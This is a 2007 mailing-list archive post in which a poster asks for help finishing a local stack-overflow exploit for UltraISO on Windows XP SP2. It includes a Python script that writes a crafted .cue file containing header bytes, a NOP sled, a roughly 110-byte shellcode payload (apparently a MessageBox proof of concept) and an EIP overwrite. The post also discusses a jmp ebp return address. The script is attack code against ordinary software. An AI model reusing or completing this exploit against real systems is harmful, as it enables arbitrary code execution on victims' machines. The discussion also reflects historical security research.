Vulnerability Development mailing list archives
Help developing exploit
From: KaCo678 () aol com
Date: 26 May 2007 17:32:12 -0000
Hi i was wondering if you would able to help.//I recently found a stack over flow in Ultra iso and was trying to write a local exploit for it..But im able to find the address where my nop sled is and every thing ive tried hasnt worked..And well as you seam to be a well respected member of the community you might be able to help me...Ive asked a few people for help with this one,,But still no further forward..Ill explain the best i can..Im able to control the ecx register and eip ..I attach aolly dbg and open the cue file..And the program crashes my eip points to 90909090 nop sled lol then i press shift + f9 and then i can write any thing i want to the eip so for testing i wrote 41424344 which then wrote to the eip and ecx register..At 3299 bytes then the 4 bytes to write to the registers..Ive provided a little test script..Its a mess but its just for testing m8..also worth noting that we still have to actually fill the rest of the file ..So altogether we have 5004 bytes to th e file..I hope im making sence i was guna use bouncing shared library's method..But not sure i changed the eip to the address of 0x7C80C75B jmp ebp as my nops where in there some where...Ive wrote a python script im using to test it ...Also if you do take a look you will need to create a fake bin file in the same directory..Any help would be great thnx for your time. #!/usr/bin/python ### import sys import struct import time head_file = "\x46\x49\x4c\x45\x20\x22" #Header of file buffer1 = "\x90" * 4000 #4000 nops nop = "\x90" * 189 #189 nops shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" # 110 bytes shell code shell += "\x77\x1d\x80\x7c" shell += "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb" shell += "\x28\xac\x80\x7c" shell += "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51" shell += "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff" shell += "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" shell += "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" shell += "\xff\x4f\x6d\x65\x67\x61\x37\x4e" fuck = "\x90" * 2 #lost 2 bytes some where made it up lol offset = "\x41\x42\x43\x44" buffer2 = "\x45" * 701 #fill the rest of the file with junk Head_end = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20" #end of file. Head_end += "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32" Head_end += "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31" Head_end += "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30" cue_file = open("1.cue","wb") cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end) cue_file.close() Im very confused at the moment as a few people have told me a few ways to exploit this lol..But im still learning..I was wondering could i just not point my eip to my nop sled..So my shell code gets executed..Im working with windows xp sp2/..Just cant seam to get to the adress of my nop code/
Current thread:
- Help developing exploit KaCo678 (May 26)
- Re: Help developing exploit Valdis . Kletnieks (May 26)
- Re: Help developing exploit Thomas Pollet (May 28)
- <Possible follow-ups>
- Re: Re: Help developing exploit KaCo678 (May 27)
- Re: Help developing exploit Valdis . Kletnieks (May 27)
- Re: Re: Help developing exploit KaCo678 (May 27)